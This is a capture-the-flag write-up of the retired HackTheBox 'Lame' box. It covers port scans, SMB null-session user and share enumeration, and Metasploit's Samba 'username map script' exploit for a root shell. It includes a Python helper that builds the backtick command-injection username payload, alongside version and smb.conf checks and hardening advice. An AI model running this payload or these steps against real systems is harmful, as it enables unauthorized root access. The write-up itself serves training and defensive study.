| Machine info | lame |
|---|---|
| Status | Retired |
| OS | Linux |
| Technique | FTP server vsftpd 2.3.4; SMB Samba 3.0.20, user enumeration over a null session; shell via Metasploit's Samba "username map script" module |
Heh, another day on the range. Grabbed a cute little Linux box to get my feet wet!!!
Continuing the "so easy" tour.
Routine information gathering first.
Full TCP port sweep:

```text
└─# nmap -sS -p- 10.10.10.3
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 16:06 CST
Nmap scan report for 10.10.10.3
Host is up (0.016s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
```

## Detailed information

Service and default-script scan of the four open ports:

```text
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: -3m49s
```

Three leads already: anonymous FTP on an old vsftpd 2.3.4, a Samba 3.x server that accepts guest access with SMB signing disabled, and an OpenSSH 4.7p1 banner that pins the host to an old Debian/Ubuntu release.
FTP, port 21
An aggressive scan (`nmap -A`) against the FTP port:

```text
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-bounce: bounce working!
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.37
OS details: DD-WRT v24-sp2 (Linux 2.4.37)
Network Distance: 2 hops
Service Info: OS: Unix
```

Take the OS guess with a grain of salt: nmap itself warns the fingerprint is unreliable, and the SSH banner already says Debian/Ubuntu rather than DD-WRT. The useful bits are the vsftpd 2.3.4 version and that FTP bounce works.
Anonymous login

| FTP weakness | FTP anonymous login allowed |
|---|---|
SMB, port 445
How to go after SMB:

| SMB 445 | SMB protocol port exploitation |
|---|---|
### nmap script probing
Enumerate shares and users with the NSE scripts (the target is 10.10.10.3, as the output below shows):

> nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.3
```text
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-users:
|   LAME\backup (RID: 1068)
|     Full name:   backup
|     Flags:       Account disabled, Normal user account
|   LAME\bin (RID: 1004)
|     Full name:   bin
|     Flags:       Account disabled, Normal user account
|   LAME\bind (RID: 1210)
|     Flags:       Account disabled, Normal user account
|   LAME\daemon (RID: 1002)
|     Full name:   daemon
|     Flags:       Account disabled, Normal user account
|   LAME\dhcp (RID: 1202)
|     Flags:       Account disabled, Normal user account
|   LAME\distccd (RID: 1222)
|     Flags:       Account disabled, Normal user account
|   LAME\ftp (RID: 1214)
|     Flags:       Account disabled, Normal user account
|   LAME\games (RID: 1010)
|     Full name:   games
|     Flags:       Account disabled, Normal user account
|   LAME\gnats (RID: 1082)
|     Full name:   Gnats Bug-Reporting System (admin)
|     Flags:       Account disabled, Normal user account
|   LAME\irc (RID: 1078)
|     Full name:   ircd
|     Flags:       Account disabled, Normal user account
|   LAME\klog (RID: 1206)
|     Flags:       Account disabled, Normal user account
|   LAME\libuuid (RID: 1200)
|     Flags:       Account disabled, Normal user account
|   LAME\list (RID: 1076)
|     Full name:   Mailing List Manager
|     Flags:       Account disabled, Normal user account
|   LAME\lp (RID: 1014)
|     Full name:   lp
|     Flags:       Account disabled, Normal user account
|   LAME\mail (RID: 1016)
|     Full name:   mail
|     Flags:       Account disabled, Normal user account
|   LAME\man (RID: 1012)
|     Full name:   man
|     Flags:       Account disabled, Normal user account
|   LAME\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account
|   LAME\mysql (RID: 1218)
|     Full name:   MySQL Server,,,
|     Flags:       Account disabled, Normal user account
|   LAME\news (RID: 1018)
|     Full name:   news
|     Flags:       Account disabled, Normal user account
|   LAME\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Account disabled, Normal user account
|   LAME\postfix (RID: 1212)
|     Flags:       Account disabled, Normal user account
|   LAME\postgres (RID: 1216)
|     Full name:   PostgreSQL administrator,,,
|     Flags:       Account disabled, Normal user account
|   LAME\proftpd (RID: 1226)
|     Flags:       Account disabled, Normal user account
|   LAME\proxy (RID: 1026)
|     Full name:   proxy
|     Flags:       Account disabled, Normal user account
|   LAME\root (RID: 1000)
|     Full name:   root
|     Flags:       Account disabled, Normal user account
|   LAME\service (RID: 3004)
|     Full name:   ,,,
|     Flags:       Account disabled, Normal user account
|   LAME\sshd (RID: 1208)
|     Flags:       Account disabled, Normal user account
|   LAME\sync (RID: 1008)
|     Full name:   sync
|     Flags:       Account disabled, Normal user account
|   LAME\sys (RID: 1006)
|     Full name:   sys
|     Flags:       Account disabled, Normal user account
|   LAME\syslog (RID: 1204)
|     Flags:       Account disabled, Normal user account
|   LAME\telnetd (RID: 1224)
|     Flags:       Account disabled, Normal user account
|   LAME\tomcat55 (RID: 1220)
|     Flags:       Account disabled, Normal user account
|   LAME\user (RID: 3002)
|     Full name:   just a user,111,,
|     Flags:       Normal user account
|   LAME\uucp (RID: 1020)
|     Full name:   uucp
|     Flags:       Account disabled, Normal user account
|   LAME\www-data (RID: 1066)
|     Full name:   www-data
|_    Flags:       Account disabled, Normal user account
```

#### User information

These are the user accounts on the target. Each account has a unique identifier (RID), normally a user name, and sometimes extra information such as a full name or description; what an account can log in to, run or access depends on its permissions and role. "Account disabled" means Samba reports the account as disabled for SMB logon. Only two entries carry no such flag, msfadmin (RID 3000) and user (RID 3002), so those are the names worth trying against SSH or FTP. Note that the entire listing came back without any credentials (`account_used: <blank>` below): the server allows a null session.

```text
| smb-enum-shares:
|   account_used: <blank>
|   \\10.10.10.3\ADMIN$:
|     Type: STYPE_IPC
|     Comment: IPC Service (lame server (Samba 3.0.20-Debian))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: <none>
|   \\10.10.10.3\IPC$:
|     Type: STYPE_IPC
|     Comment: IPC Service (lame server (Samba 3.0.20-Debian))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|   \\10.10.10.3\opt:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: <none>
|   \\10.10.10.3\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|   \\10.10.10.3\tmp:
|     Type: STYPE_DISKTREE
|     Comment: oh noes!
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|_    Anonymous access: READ/WRITE
```

Analysis:
- `\\10.10.10.3\ADMIN$`: an IPC (Interprocess Communication) share, the administrative endpoint for managing the server over the network. The reported path `C:\tmp` is what Samba returns for its IPC shares, not a browsable directory; no anonymous access.
- `\\10.10.10.3\IPC$`: also an IPC share with the same reported path; anonymous users get READ/WRITE, which is what made the user enumeration above possible.
- `\\10.10.10.3\opt`: a disk-tree share with no comment, reported path `C:\tmp`; no anonymous access.
- `\\10.10.10.3\print$`: the printer-drivers share, path `C:\var\lib\samba\printers`; no anonymous access.
- `\\10.10.10.3\tmp`: a disk-tree share with the comment "oh noes!", path `C:\tmp`; anonymous READ/WRITE, so an unauthenticated client can drop files on the box.

The share comments also leak the exact server build, `Samba 3.0.20-Debian`, which is the key piece of information for what follows.
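Triage of a listing like the one above is usually done by eye; the following is an added example, not code from the original post, that parses nmap's `smb-enum-users` output into records, filters out the accounts Samba flags as disabled, and recovers the Unix uid behind each RID. The sample input is a constructed excerpt in the same format as the scan output; the RID-to-uid conversion assumes Samba 3's default algorithmic mapping (`rid = uid * 2 + 1000` for users), which matches the RIDs seen on this box (msfadmin RID 3000 is uid 1000, root RID 1000 is uid 0).

```python
"""Parse nmap smb-enum-users output and pick out the accounts worth targeting.

Added example, not code from the original post. SAMPLE is a constructed
excerpt in the scan's format; rid_to_uid assumes Samba 3's default
algorithmic RID mapping (users: rid = uid * 2 + 1000).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed excerpt of the scan output (same format, four of the entries).
SAMPLE = r"""
| smb-enum-users:
|   LAME\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account
|   LAME\root (RID: 1000)
|     Full name:   root
|     Flags:       Account disabled, Normal user account
|   LAME\sshd (RID: 1208)
|     Flags:       Account disabled, Normal user account
|   LAME\user (RID: 3002)
|     Full name:   just a user,111,,
|_    Flags:       Normal user account
"""

# "|   DOMAIN\name (RID: n)" header line of one entry (the last one starts with "|_")
USER_RE = re.compile(r"^\|_?\s+(?P<domain>[^\\\s]+)\\(?P<name>\S+)\s+\(RID:\s*(?P<rid>\d+)\)\s*$")
# "|     Full name:   ..." / "|     Flags:       ..." detail lines
FIELD_RE = re.compile(r"^\|_?\s+(?P<key>Full name|Flags):\s*(?P<val>.*?)\s*$")


def rid_to_uid(rid: int) -> Optional[int]:
    """Invert Samba 3's algorithmic RID mapping (assumption, see lead-in).

    Users get even offsets above 1000, groups the odd ones. RIDs below 1000
    are well-known RIDs (501 = Guest, which nmap shows for 'nobody') and
    carry no uid.
    """
    if rid < 1000 or (rid - 1000) % 2:
        return None
    return (rid - 1000) // 2


@dataclass
class SmbUser:
    domain: str
    name: str
    rid: int
    full_name: str = ""
    flags: tuple = ()

    @property
    def enabled(self) -> bool:
        # Anything Samba did not flag as disabled is a candidate for password guessing.
        return "Account disabled" not in self.flags

    @property
    def uid(self) -> Optional[int]:
        return rid_to_uid(self.rid)


def parse_smb_enum_users(text: str) -> List[SmbUser]:
    """Turn the script's indented text block into SmbUser records."""
    users: List[SmbUser] = []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            users.append(SmbUser(m["domain"], m["name"], int(m["rid"])))
            continue
        m = FIELD_RE.match(line)
        if m and users:  # detail lines belong to the most recent header
            if m["key"] == "Full name":
                users[-1].full_name = m["val"]
            else:
                users[-1].flags = tuple(f.strip() for f in m["val"].split(","))
    return users


def enabled_accounts(text: str) -> List[str]:
    """Names of the accounts not flagged as disabled, in listing order."""
    return [u.name for u in parse_smb_enum_users(text) if u.enabled]


if __name__ == "__main__":
    for u in parse_smb_enum_users(SAMPLE):
        state = "ENABLED " if u.enabled else "disabled"
        print(f"{state} {u.domain}\\{u.name:<10} rid={u.rid:<5} uid={u.uid} {u.full_name}")
```

Feed it the full scan output instead of `SAMPLE` and the two enabled names (msfadmin, user) fall out directly, together with their uids, which is handy later for matching a shell's `id` output back to the enumeration.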
| Client connection to the shares | What to do once a particular share is found? |
|---|---|

The smbclient tool can connect directly to shares that allow anonymous access.
Connect and list what is there (`smbclient -L 10.10.10.3`, pressing Enter at the password prompt for an anonymous session):

```text
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME
```
A look around the shares turned up nothing useful. The one thing gained is the version string, Samba 3.0.20-Debian, so look that up in Exploit-DB with searchsploit:

```text
Exploit Title                        | Path
------------------------------------ ---------------------------------
Samba 3.0.10 < 3.3.5 - Format Strin  | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Usernam  | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overfl  | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Ser  | linux_x86/dos/36741.py
```

(Titles are cut off by the terminal width.) The one to note is ***Samba 3.0.20 < 3.0.25rc3 - 'Usernam | unix/remote/16320.rb***: 3.0.20 sits inside that range, and the `.rb` path tells you it is a Metasploit module.
| Samba reproduction | Samba 3.0.20 to 3.0.25rc3 |
|---|---|

Samba exploitation
Metasploit ships this Samba exploit; searching for it in msfconsole gives:

```text
0  exploit/multi/samba/usermap_script  2007-05-14  excellent  No  Samba "username map script" Command Execution
```

The routine setup (set RHOSTS to the target and LHOST to your own address, then run) is not repeated here. Note that the Check column says No: the module has no safe pre-check, it simply fires. Two things a practitioner should know about it: the bug is only exploitable when `username map script` is configured in smb.conf (the version alone does not guarantee it; on this box it is set, which is why the module works), and because smbd runs as root the shell you get back is already root. So there is no privilege escalation step: read user.txt under makis's home directory and root.txt under /root straight away.
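To make clear why a Samba version string turns into a root shell, here is an added example (not code from the original post or from the Metasploit module) in Python. It shows the shape of the username the `usermap_script` module sends and why it works, and pairs it with the two checks that decide whether a host is actually exploitable: the version range Exploit-DB lists for 16320.rb, and whether `username map script` is set in smb.conf. Assumptions, labelled in the comments as well: the range bounds (3.0.20 up to but not including 3.0.25rc3) are taken from the Exploit-DB title, and the two smb.conf snippets are constructed samples rather than this box's real configuration.

```python
"""Why CVE-2007-2447 (Samba "username map script") gives a root shell, plus
the two checks that decide whether a host is exploitable.

Added example; not code from the original post or from the Metasploit module.
Assumptions: the vulnerable range is the one Exploit-DB lists for 16320.rb
(3.0.20 <= version < 3.0.25rc3); the smb.conf snippets are constructed samples.
"""
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]


def parse_samba_version(banner: str) -> Optional[Version]:
    """'Samba 3.0.20-Debian' -> (3, 0, 20, 99); '3.0.25rc3' -> (3, 0, 25, 3).
    A release candidate sorts before the final release, so a final gets 99."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", banner)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else 99)


def version_in_vulnerable_range(banner: str) -> bool:
    """Range from the Exploit-DB title 'Samba 3.0.20 < 3.0.25rc3' (assumption)."""
    v = parse_samba_version(banner)
    return v is not None and (3, 0, 20, 0) <= v < (3, 0, 25, 3)


def username_map_script(smb_conf: str) -> Optional[str]:
    """Return the 'username map script' value from [global], or None.

    The version alone is not enough: smbd only runs the script when this
    option is set. smb.conf parameter names are case-insensitive and ignore
    internal whitespace; comments start with '#' or ';'.
    """
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "global" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if re.sub(r"\s+", "", key).lower() == "usernamemapscript":
            return value.strip()
    return None


def usermap_payload(cmd: str) -> str:
    """Username that makes the map script run `cmd`.

    smbd substitutes the client-supplied username into the script's command
    line and runs it through the shell without escaping, so backticks in the
    username execute whatever is inside them, as root, because smbd itself
    runs as root. '/=' plus nohup is the same shape the Metasploit module
    uses; nohup keeps the command alive after the short-lived script exits.
    """
    return "/=`nohup " + cmd + "`"


# Constructed sample configs (assumption: not the target's real smb.conf).
VULNERABLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   ; the line that makes CVE-2007-2447 exploitable:
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
"""

HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   # 'username map script' removed; a static 'username map' file has no shell
   username map = /etc/samba/smbusers

[tmp]
   path = /tmp
   guest ok = no
   writable = no
"""


def assess(banner: str, smb_conf: str) -> str:
    """Combine both checks the way you would when triaging a host."""
    in_range = version_in_vulnerable_range(banner)
    script = username_map_script(smb_conf)
    if in_range and script:
        return f"vulnerable: {banner} runs '{script}' for every username"
    if in_range:
        return "version in range but no 'username map script' set: not exploitable"
    return "version outside the vulnerable range"


if __name__ == "__main__":
    print(assess("Samba 3.0.20-Debian", VULNERABLE_SMB_CONF))
    print(assess("Samba 3.0.20-Debian", HARDENED_SMB_CONF))
    print("payload username:", usermap_payload("id > /tmp/pwned"))
```

The config check is the part worth keeping around: on a box you administer, `username map script` is the single line to remove, and a static `username map` file gives the same account aliasing with no shell involved.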
Originally published on the WeChat public account 探险者安全团队: 小k梭靶场-HackTheBox-Lame
Disclaimer: the programs and methods in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or otherwise reliable mailbox so the message is not filtered; contact details are on the home page).